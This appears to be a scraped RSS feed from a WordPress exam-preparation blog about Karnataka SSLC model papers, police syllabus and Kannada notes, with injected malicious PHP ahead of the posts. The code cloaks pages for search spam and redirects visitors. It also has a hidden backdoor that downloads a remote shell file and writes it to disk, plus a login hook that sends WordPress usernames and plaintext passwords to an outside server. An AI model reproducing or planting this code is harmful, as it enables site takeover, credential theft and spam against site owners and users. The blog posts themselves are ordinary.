if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" > <channel> <title>Whatsapp groups http://whatsappgroups.org My WordPress Blog Fri, 03 Mar 2023 16:18:28 +0000 en-US hourly 1 https://wordpress.org/?v=6.1.1 SSLC MCQ Based Sanskrit Model Question Paper http://whatsappgroups.org/?p=995 http://whatsappgroups.org/?p=995#respond Fri, 03 Mar 2023 16:18:27 +0000 https://whatsappgroups.org/?p=995 Karnataka Board SSLC Sanskrit Model Question Paper is available here. Karnataka Board Class 10 Sanskrit Sample Question Paper are the key tools to score high marks in the examination. Model papers helps a lot to Students to get good marks .Students will be able to get a bunch of question papers for Sanskrit of class […]]]>

Karnataka Board SSLC Sanskrit Model Question Paper is available here. Karnataka Board Class 10 Sanskrit Sample Question Paper are the key tools to score high marks in the examination. Model papers helps a lot to Students to get good marks .Students will be able to get a bunch of question papers for Sanskrit of class 10 from below. This page will help the students in assessing their performance level by providing the sample papers.

Karnataka Class 10 Sanskrit Model Question Paper is available below. Candidates can also download it.

DOWNLOAD

Thanks for downloading pdf and also thanks for Visiting our website..

Browse our website for further updates..

]]>
http://whatsappgroups.org/?feed=rss2&p=995 0
SSLC Sociology Model Question Paper http://whatsappgroups.org/?p=982 http://whatsappgroups.org/?p=982#respond Wed, 01 Mar 2023 14:46:55 +0000 https://whatsappgroups.org/?p=982 Karnataka SSLC Preparatory Exam Question Paper are the question papers asked in KSEAB preparatory exams for class 10. You can download the Karnataka Board Class 10 Preparatory Exam Question Paper PDF here to prepare for your board exams. Prepare well students..You should solve these Karnataka board previous year question papers along with class 10 preparatory […]]]>

Karnataka SSLC Preparatory Exam Question Paper are the question papers asked in KSEAB preparatory exams for class 10. You can download the Karnataka Board Class 10 Preparatory Exam Question Paper PDF here to prepare for your board exams. Prepare well students..You should solve these Karnataka board previous year question papers along with class 10 preparatory model papers. You get a lot of benefit by practicing last 5 years question papers of Karnataka board class 10 preparatory exams as they give you a good idea of what to expect in your board exams. Try hard work hard study smart.. Moreover the Karnataka SSLC Preparatory Exam Question Paper with solution key are an important learning resource to get 100% marks in tests.

U will get good marks

Hope for the best

All the best dear students

DOWNLOAD

Thank you all for visiting and downloading pdf from our website

Please come and view our website for further information

Once again thank you ☺

]]>
http://whatsappgroups.org/?feed=rss2&p=982 0
sslc.karnataka.gov.in 2023 Question Paper PDF http://whatsappgroups.org/?p=978 http://whatsappgroups.org/?p=978#respond Tue, 28 Feb 2023 17:13:01 +0000 https://whatsappgroups.org/?p=978 Sample papers are given in this post to get maximum marks in the 10th board exam. Which study pattern or program they should choose to get high marks in this exam is given through this post.We try many different methods before the exam which can help us in preparing for the exam. I am pretty sure, that many of you must have heard that Karnataka Board SSLC Model Model Paper 2023 will help your brain to learn better if you eat chocolate just before starting your studies..

The Karnataka Board of Secondary Education Examination has released the SSLC Model Question Papers with Answer Keys on the official website. Karnataka Board Class 10 Model Question Paper 2023 Modal paper is available for all subjects like maths, science, social studies, and languages ​​like Kannada, English, and Hindi. Complete information about Karnataka SSLC Exam 2023 is given in the post below.

Secondary School Leaving Certificate Sample Question Paper 2023 with SEEB March Exam Pattern/Mock Test of Karnataka PDF-Students can now download KSEEB Class 10th Question Paper 2023 with new exam pattern pdf at sslc.karnataka.gov.in

please check it out students

DOWNLOAD

https://drive.google.com/file/d/1VME2DYuwdqKB4H9Oc7HdJASW1YhJ0ZM2/view?usp=drivesdk

]]>
http://whatsappgroups.org/?feed=rss2&p=978 0
Karnataka State Police Syllabus 2023 http://whatsappgroups.org/?p=972 http://whatsappgroups.org/?p=972#respond Mon, 27 Feb 2023 14:27:29 +0000 https://whatsappgroups.org/?p=972 The Karnataka Police Recruitment Board will soon conduct the written examination. The official notification will be released soon. Before applying for the post, it will be a great idea if you go through the Karnataka Police Constable Syllabus 2023 and the KSP Constable Exam Pattern 2023. Candidates who are preparing for the exam dates can prepare themselves by checking the exam Karnataka PC Syllabus 2023 and the exam pattern. To know more about the subject we have provided you with the detailed information on the KSP Constable Syllabus 2023 and the pattern.

As the exam date is about to be announced, all the candidates should start revision as per syllabus and then wait for the exam notice. Also try to become Physically Fit because after passing KSP Result, you will be called for Physical Exam.

The Karnataka State Police will release the notification soon on ksp.karnataka.gov.in. The updated Karnataka Police Constable Syllabus 2023 will be provided in this article. Candidates can simply download and check the KSP PC Syllabus 2023 from this page. The KSP Recruitment Board has divided the selection tests in various Recruitment procedures that we have mentioned in this article.

The Exam Date is expected to be announced so this means that all of you should start your revision as per the syllabus and also try to give mock tests available online. Once you have good practice, you will get good marks in the exam which assures your selection further.

All the applicants have to clear these following stages in order to get selected for the vacancy in which they have applied. So make sure you have good preparation as per KSP PC Syllabus 2023 and Karnataka State Police Selection Process 2023. Applicants should have done the preparation as per syllabus and then clear these stages to get selected for the vacancy.

1-Written exam

2- Physical standard

3-Medical test

4-Document verification

5- Personality Test

There will be two sections in the KSP Constable Exam Pattern 2023.There will be a negative marking of 0.25 marks for every wrong answer for MCQs only.The exam will be for a time duration of 90 minutes that is 1 hour 30 minutes. OMR Sheet based Exam will be conducted in Pen and Paper Mode for all the Applicants.Every applicant should prepare as per exam pattern above and then score good marks.

The KSP PC Syllabus 2023 includes the one for the descriptive exam and the multiple choice questions. Read the following article to know about the KSP PC Syllabus 2023.

1.Descriptive Paper

•Jumbled sentence

•Anaphora

•Select the correct question tag

•Select the tense

•Phrase replacement

•Sentence improvement

•Fill in the blanks

•Clever

•Correct voice

•Match the following words

•Metaphor

•Personification

•Allusion

•Alliteration

•Select the plural forms

•Error spotting

2. Multiple Choice Questions

•Science

•Economy

•General politics

•India and its neighbouring countries

•CapitalGeography

•Current affairs

•Budget and five year plan

•History

•Scientific research

•Culture

•Books

•National and International awards

•Currency

•General knowledge

•Banking and Finance.

DOWNLOAD

Thank you for downloading and please keep visiting our website for more updates.

All the best dear Candidates.

]]>
http://whatsappgroups.org/?feed=rss2&p=972 0
Important notes for Indian Constitution http://whatsappgroups.org/?p=955 http://whatsappgroups.org/?p=955#respond Thu, 03 Nov 2022 06:47:28 +0000 https://whatsappgroups.org/?p=955 Articles of Indian Constitution: Below given is the detailed description of Important Articles of the Indian Constitution for UPSC, PDF. The constitution has a preamble and 470 articles, which are grouped into 25 parts. With 12 schedules and five appendices, it has been amended 105 times; the latest amendment became effective on 10 August 2021. 1950 […]]]>

Articles of Indian Constitution: Below given is the detailed description of Important Articles of the Indian Constitution for UPSC, PDF.

The constitution has a preamble and 470 articles, which are grouped into 25 parts. With 12 schedules and five appendices, it has been amended 105 times; the latest amendment became effective on 10 August 2021.

1950

The Constitution of India came into force on 26th January, 1950. At the time of its adoption, the Constitution contained 395 Articles and 8 Schedules

its useful for all Competitive exams…. This notes covers all important information of all Indian Constitution…

To Download the PDF click on the Download button…

]]>
http://whatsappgroups.org/?feed=rss2&p=955 0
Important Previous papers for SDA and FDA Exams http://whatsappgroups.org/?p=949 http://whatsappgroups.org/?p=949#respond Thu, 03 Nov 2022 04:59:45 +0000 https://whatsappgroups.org/?p=949 Important notes for FDA and SDA exams general question and key answer notes General Knowledge and General Awareness are some of the most important topics to cover when it comes to preparation for the competitive exams. General Knowledge: Awards; Authors; Flower; Defence; Culture; Religion; Languages; Capitals General Mental Ability & Aptitude Test – For IAS, […]]]>

Important notes for FDA and SDA exams

general question and key answer notes

General Knowledge and General Awareness are some of the most important topics to cover when it comes to preparation for the competitive exams.

General Knowledge: Awards; Authors; Flower; Defence; Culture; Religion; Languages; Capitals

General Mental Ability & Aptitude Test – For IAS, KAS, FDA, SDA PDO, PSI and all other KPSC Exams

The KPSC FDA Previous Year Question Papers is useful in understanding the exam pattern and syllabus thoroughly

]]>
http://whatsappgroups.org/?feed=rss2&p=949 0
Important Kannada notes for all compitative exams.. http://whatsappgroups.org/?p=946 http://whatsappgroups.org/?p=946#respond Wed, 02 Nov 2022 17:39:04 +0000 https://whatsappgroups.org/?p=946 General Kannada Grammar PDF Notes are very useful For Competitive exams like TET and Graduate Primary School Teachers Recruitment. Easy to Learn Basics of Kannada Grammar, FDA, SDA, KAS, PDO, Kannada grammar. In Kesava’s age most of the rules of Kannada grammar were fixed. That before him there had been grammarians who had not deserved […]]]>

General Kannada Grammar PDF Notes are very useful For Competitive exams like TET and Graduate Primary School Teachers Recruitment.

Easy to Learn Basics of Kannada Grammar, FDA, SDA, KAS, PDO,

Kannada grammar. In Kesava’s age most of the rules of Kannada grammar were fixed. That before him there had been grammarians who had not deserved that name,

Learn the Kannada grammar such as prepositions, negation, questions, adverbs, pronouns, personal, object, possessive pronouns through our lessons online, …

]]>
http://whatsappgroups.org/?feed=rss2&p=946 0
